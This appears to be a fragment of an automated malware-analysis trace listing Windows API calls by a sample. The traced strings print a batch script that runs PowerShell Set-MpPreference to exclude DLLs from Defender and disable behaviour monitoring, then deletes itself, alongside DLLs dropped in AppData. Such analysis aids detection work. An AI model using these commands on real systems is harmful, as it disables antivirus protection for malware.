                                                                • lstrcatA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo timeout 3 > ,oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,.bat), ref: 00401EDC
                                                                • lstrcatA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,start /min ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo timeout 3 > ,oh161a161.bat,.bat), ref: 00401EEB
                                                                • lstrcatA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,start /min ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo timeout 3 > ), ref: 00401EFA
                                                                • lstrcatA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,0043F701,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,start /min ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat), ref: 00401F09
                                                                • lstrcatA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,C:\Users\user\AppData\Local\Temp\oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,0043F701,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,start /min ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> ), ref: 00401F18
                                                                • lstrcatA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,",echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,C:\Users\user\AppData\Local\Temp\oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,0043F701,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,start /min ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat), ref: 00401F2E
                                                                • lstrlenA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,00000000,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,",echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,C:\Users\user\AppData\Local\Temp\oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,0043F701,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,start /min ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo exit >> ), ref: 00401F45
                                                                • _lwrite.KERNEL32(00000000,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,00000000,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,00000000,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,",echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,C:\Users\user\AppData\Local\Temp\oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,0043F701,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,start /min ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te), ref: 00401F51
                                                                • CloseHandle.KERNEL32(00000000,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,00000000,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,00000000,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,",echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,C:\Users\user\AppData\Local\Temp\oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,0043F701,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,start /min ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te), ref: 00401F56
                                                                • ShellExecuteExA.SHELL32(0044722B,00000000,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,00000000,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,00000000,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,",echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,C:\Users\user\AppData\Local\Temp\oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,0043F701,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,start /min ), ref: 00401FA0
                                                                • Sleep.KERNEL32(00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,\IDFcan), ref: 00401FAA
                                                                • GetTempPathA.KERNEL32(000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,\IDFcan), ref: 00401FB9
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,\IDFcan), ref: 00401FC8
                                                                • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,\IDFcan), ref: 00401FD2
                                                                • CloseHandle.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,\IDFcan), ref: 00401FDE
                                                                • lstrcpyA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 00402078
                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 00402082
                                                                • lstrcpyA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 004020B1
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,\miakhad.dll,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 004020C0
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,\miakhad.dll,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 004020CF
                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,\miakhad.dll,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 004020D9
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 004020E8
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 004020FB
                                                                • Sleep.KERNEL32(00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 00402106
                                                                • Sleep.KERNEL32(000009C4,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 00402119
                                                                • Sleep.KERNEL32(000009C4,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 0040212C
                                                                • Sleep.KERNEL32(000009C4,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 0040213F
                                                                • Sleep.KERNEL32(000009C4,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 00402152
                                                                • Sleep.KERNEL32(000009C4,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 00402165
                                                                • Sleep.KERNEL32(0000157C,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 00402178
